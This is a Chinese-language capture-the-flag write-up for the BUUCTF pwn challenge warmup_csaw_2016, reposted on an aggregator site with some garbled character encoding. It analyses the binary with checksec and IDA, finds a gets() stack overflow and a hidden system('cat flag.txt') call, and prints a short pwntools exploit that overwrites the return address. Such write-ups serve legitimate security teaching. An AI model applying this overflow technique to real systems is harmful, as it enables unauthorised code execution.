[BUUCTF-pwn]——warmup_csaw_2016

• 題目地址：https://buuoj.cn/challenges#warmup_csaw_2016
• 題目：
  
  管他三七二十一，先將文件下載下來再說。老規(guī)矩，現(xiàn)在Linux上用checksec看看文件。64位，Stack、NX、PIE都沒有開，應該是棧溢出的題。
  
  趕快 go go go 去window 上用IDA反匯編看看，看到返回的是gets函數(shù)，一個典型的可以利用棧溢出覆蓋的地方。其他沒什么有用的信息。
  
  按Shift + F12，看一下字符串。不看不知道一看有驚喜。cat flag.txt。雖然沒有 /bin/sh，可以獲得權(quán)限。但是這個足夠我們拿到flag了。
  
  雙擊，發(fā)現(xiàn)在sub_40060D這個函數(shù)里面。
  
  進這個函數(shù)看看，眼前一亮，就是我們想要的 system(“cat flag.txt”)
  點擊查看函數(shù)所在位置，發(fā)現(xiàn)0x400611是壓參數(shù)的地方
  。我們可以將其作為返回地址。
  
  

查看v5的位置，發(fā)現(xiàn)離返回地址的距離是0x40 + 8。

所以這道題的exploit為

from pwn import * p = remote('ip地址',ip端口) payload='a'*(0x40+8)+p64(0x400611) p.sendline(payload) p.interactive()

其實這道題和上一道題解法基本一樣，感興趣的也可以去看看 😃

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——warmup_csaw_2016的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。